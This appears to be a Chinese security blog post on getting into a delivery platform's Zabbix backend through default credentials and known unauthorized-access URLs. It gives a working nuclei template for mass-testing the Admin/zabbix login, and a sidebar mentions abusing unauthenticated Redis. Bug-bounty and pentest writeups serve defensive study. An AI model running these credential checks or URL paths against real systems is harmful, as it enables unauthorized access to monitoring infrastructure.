某配送平台未授权访问和弱口令(附赠nuclei默认密码验证脚本)

已于 2024-06-28 17:15:16 修改
阅读量679 收藏 11
点赞数 3
文章标签: 漏洞 安全 渗透 代码审计
于 2024-06-28 17:03:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zkaqlaoniao/article/details/140048459
版权

找到一个某src的子站,通过信息收集插件,发现ZABBIX-监控系统,可以日一下

使用谷歌搜索历史漏洞:zabbix漏洞


通过目录扫描扫描到后台,谷歌搜索一下有没有默认弱口令


 


成功进去了,挖洞就是这么简单

搜索文章还报过未授权访问漏洞,打一波

 

  1. /overview.php?ddreset=1
  2. /srv_status.php?ddreset=1
  3. /latest.php?ddreset=1
  4. /zabbix.php?action=problem.view&ddreset=1
 

 

 

 

 


 又成功进去了,已经清除缓存在拼接路径的,进去成功寻找功能点,在搜索位置输入任何东西,前端页面就会显示什么,猜测可能存在反射xss,但没什么用,继续测试ssti注入
 

 

 

 


 不存在,这个站还可以getshell,但是点到位置,后台进去了,人也进去了
 黑盒测试ssti注入这个工具推荐一下,用这个工具还挖出过几个洞,这个感觉已经是公开最好的工具了:GitHub - vladko312/SSTImap: Automatic SSTI detection tool with interactive interface
 

 

顺便写了一个nuclei批量默认密码验证脚本
 

【Nuclei-Poc】
 

 

  1. id: zabbix-default-credential-check
  3. info:
  4. name: Zabbix Default Credential Check
  5. author: 
  6. severity: high
  7. description: Check for default credentials in Zabbix.
  8. tags: zabbix,default,cred
  10. requests:
  11. - method: POST
  12. path:
  13. - "{{BaseURL}}/zabbix/index.php"
  15. body: |
  16. name=Admin&password=zabbix&autologin=1&enter=Sign+in
  18. headers:
  19. Content-Type: application/x-www-form-urlencoded
  20. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
  21. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  22. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  23. Accept-Encoding: gzip, deflate
  24. Connection: close
  25. Upgrade-Insecure-Requests: 1
  26. Origin: "{{BaseURL}}"
  27. Referer: "{{BaseURL}}/zabbix/"
  29. matchers-condition: and
  30. matchers:
  31. - type: word
  32. words:
  33. - "Location: zabbix.php?action=dashboard.view"
  34. part: header
  36. - type: status
  37. status:
  38. - 302
 

【验证】
 

.\nuclei -l xx.txt -t xx.yaml
 

 

 

  申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

                

        

        

    

  


    

      

        

            

              
                
                  渗透测试老鸟-九青
                
              
            

            

                关注
              
            

        

        

          
      

      









                



	

		

			

				
					
复现nuclei——redis授权访问漏洞

				
			

			

				

					 记录并分享学习安全的知识点..
				

				

					02-11
					
					1326
					
				

			

		

		

			
				
一、漏洞介绍

Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的 /root/

			
		

	



                

              
                



	

		

			

				
					
漏洞复现】GB28181摄像头管理平台-授权访问-api

				
			

			

				

					知黑而守白
				

				

					07-10
					
					130
					
				

			

		

		

			
				
GB28181是中国国家标准中关于IP视频监控设备的标准之一。它规定了视频监控设备之间的通信协议和数据格式,以便实现设备之间的互联互通。GB28181摄像头管理平台则是用于管理和监控这些符合GB28181标准的摄像头设备的软件平台,GB28181摄像头管理平台在安防领域具有广泛的应用,可以用于监控各种场所,如公共交通、城市道路、企业园区等,提高了监控系统的整体效率和管理水平。

			
		

	



                


  
              

                


	

		

			

				
					
Red Tools 渗透测试-内网漏洞扫描

				
			

			

				

					jennycisp的博客
				

				

					12-19
					
					737
					
				

			

		

		

			
				
轻量级内网资产探测漏洞扫描工具,甜心宝贝是一款支持弱口令爆破的内网资产探测漏洞扫描工具,集成了Xray与Nuclei的Poc。

			
		

	





	

		

			

				
					
常用开源的弱口令检查审计工具

				
			

			

				

					Marsal的博客
				

				

					08-08
					
					7462
					
				

			

		

		

			
				
常用的密码爆破工具

			
		

	



		

			
		



	

		

			

				
					
Nuclei Poc开发

				
			

			

				

					2301_80127209的博客
				

				

					03-25
					
					695
					
				

			

		

		

			
				
Cloud Platfrom云平台:https://cloud.projectdiscovery.io/目标演示站点:http://glkb-jqe1.aqlab.cn/nacos/#/login指纹:Nacos已知常用漏洞利用:Nacos弱口令 账密:nacos/nacosNacos 敏感信息泄露 /nacos/v1/auth/users?Nacos 任意用户创建:/nacos/v1/auth/users?Nacos通用弱口令:Win64;q=0.9返回JWT。

			
		

	





	

		

			

				
					
【工具分享】Nuclei——基于模板的漏洞验证

				
			

			

				

					LongL_GuYu的博客
				

				

					06-29
					
					1218
					
				

			

		

		

			
				
Nuclei 是一款注重于可配置性、可扩展性和易用性的基于模板的快速漏洞验证工具。它使用 Go 语言开发,具有强大的可配置性、可扩展性,并且易于使用。

			
		

	





	

		

			

				
					
15000+POC漏洞扫描工具(非常详细)零基础入门到精通,收藏这一篇就够了

				
			

			

				

					Javachichi的博客
				

				

					04-15
					
					435
					
				

			

		

		

			
				
scan4all拥有15000+PoC漏洞扫描,23种应用弱口令爆破,7000+Web指纹,146种协议,90000+规则Port扫描。集成 vscan、nuclei、ksubdomain、subfinder等,充分自动化进行扫描。是一款Fuzz、HW打点、BugBounty神器等工具。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。自定义输出结果JSON或CSV。

			
		

	





	

		

			

				
					
Day101:漏洞发现-漏扫项目篇&Nuclei&Yakit&Goby&Afrog&Xray&Awvs&联动中转被动

				
			

			

				

					qq_61553520的博客
				

				

					04-14
					
					1383
					
				

			

		

		

			
				
小迪安全-Day101:漏洞发现-漏扫项目篇&Nuclei&Yakit&Goby&Afrog&Xray&Awvs&联动中转被动

			
		

	





	

		

			

				
					
漏洞复现】MM文档管理器-授权访问-display

				
			

			

				

					知黑而守白
				

				

					05-24
					
					79
					
				

			

		

		

			
				
MM文档管理器是一个功能强大的文档管理工具,旨在帮助用户有效地组织、查找和分享各种类型的文档,包括文档分类与标签管理、文档检索与搜索、版本控制与历史记录、团队协作与分享、在线预览与编辑、以及安全性与备份等功能。MM文档管理器 display接口处存在授权访问漏洞,恶意攻击者可能利用此漏洞访问授权访问服务器,获取服务器敏感信息,最终可能导致服务器失陷。

			
		

	





	

		

			

				
					
nuclei:主动式IO和运行时系统

				
			

			

				

					04-14
				

			

		

		

			
				
Nuclei:主动式IO和运行时系统  Nuclei是基于IO系统,与运行时无关,可以与任何运行时一起使用。 前摄器系统的设计原理与相匹配。 核不使用常规的React器方法。 它是完全异步的,并且以主动方式包装基于轮询的IO。  ...

			
		

	





	

		

			

				
					
Fiora-为PoC框架nuclei提供图形界面

				
			

			

				

					02-07
				

			

		

		

			
				
Nuclei是一款现代化、速度极快的PoC框架,它专注于网络扫描和低级别的漏洞验证,其轻量级的设计使得它在大规模网络资产检查时尤为高效。然而,命令行界面虽然对于高级用户来说非常灵活,但对初学者或不熟悉命令行的...

			
		

	





	

		

			

				
					
漏洞复现】大华-智能物联综合管理平台-默认口令-token

				
			

			

				

					知黑而守白
				

				

					05-24
					
					394
					
				

			

		

		

			
				
浙江大华技术股份有限公司智能物联综合管理平台是一款基于物联网技术的综合性管理平台,旨在为企业和用户提供智能化、便捷化的物联网解决方案。该平台整合了大华技术在视频监控、数据采集、数据分析等方面的核心技术,实现了对各类物联网设备的统一管理和控制,提高了企业的运营效率和管理水平。智能物联综合管理平台存在默认密码漏洞,通过默认用户名密码可以访问后台。

			
		

	





	

		

			

				
					
漏洞扫描】afrog v2.9.9 官方版-快速上手版

				
			

			

				

					qq_47493625的博客
				

				

					02-04
					
					3107
					
				

			

		

		

			
				
Afrog是一款高性能的漏洞扫描器,快速稳定。它支持用户自定义的 PoC,并内置了多种类型,例如 CVE、CNVD、默认密码、信息泄露、指纹识别、授权访问、任意文件读取和命令执行。借助 afrog,网络安全专业人员可以快速验证和修复漏洞,这有助于增强其安全防御能力。

			
		

	





	

		

			

				
					
CTFHUB技能树之HTTP协议——响应包源代码

				
			

			

				

					weixin_73049307的博客
				

				

					10-13
					
					456
					
				

			

		

		

			
				
点击“开始”没有抓取到报文,先看看网页源代码是什么情况。居然直接给出flag了,不知道这题的意义何在。是个贪吃蛇小游戏,看不出来有什么特别的地方。

			
		

	





	

		

			

				
					
等保测评:如何进行有效的安全合规性审查

				
			

			

				

					2301_79955948的博客
				

				

					10-18
					
					444
					
				

			

		

		

			
				
等保测评(信息安全等级保护测评)是一项至关重要的安全合规性审查工作,旨在帮助组织保障信息系统的安全性、合规性,有效应对安全风险,提升整体安全防护水平。

			
		

	





	

		

			

				
					
【红日安全】vulnstack (一)

				
			

			

				

					m0_71944965的博客
				

				

					10-18
					
					307
					
				

			

		

		

			
				
靶场下载链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
下载解压后在VM中打开目标跟我们处于同一个网段先查一下我们自己的IP,用 ifconfig 查看攻击机的IP为192.168.64.131探测一下跟我们同一网段下的主机有哪些,用Kali自带的arp扫描扫描同一网段下的主机,发现了同一网段下的不同IP,判断它就是要渗透的主机。
扫到IP之后接下来扫描端口,发现它开启了、端口
访问一下80端口,发现是phpStudy探针界面,在其中发现了它的操作

			
		

	





	

		

			

				
					
面对AI算力需求激增,如何守护数据中心机房安全?

					
最新发布

				
			

			

				

					HKT香港电讯的博客
				

				

					10-18
					
					260
					
				

			

		

		

			
				
面对AI时代算力需求飙升所带来的更高安全要求和挑战,数据中心机房需要具备更完善的容灾能力及应急预案。同时应从多个方面入手,全面提升安全防护能力,从而有效应对安全隐患及突发事故。

			
		

	





	

		

			

				
					
常见的内网渗透思路及方法(包含示例)

				
			

			

				

					xixixi7777的博客
				

				

					10-11
					
					1086
					
				

			

		

		

			
				
内网渗透是指在企业或组织的内部网络中进行安全测试,以发现和利用网络中的安全漏洞

			
		

	





	

		

			

				
					
【京准电钟】“安全卫士”:卫星时空安全隔离防护装置

				
			

			

				

					NTP授时服务器
				

				

					10-18
					
					273
					
				

			

		

		

			
				
【京准电钟】“安全卫士”:卫星时空安全隔离防护装置

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值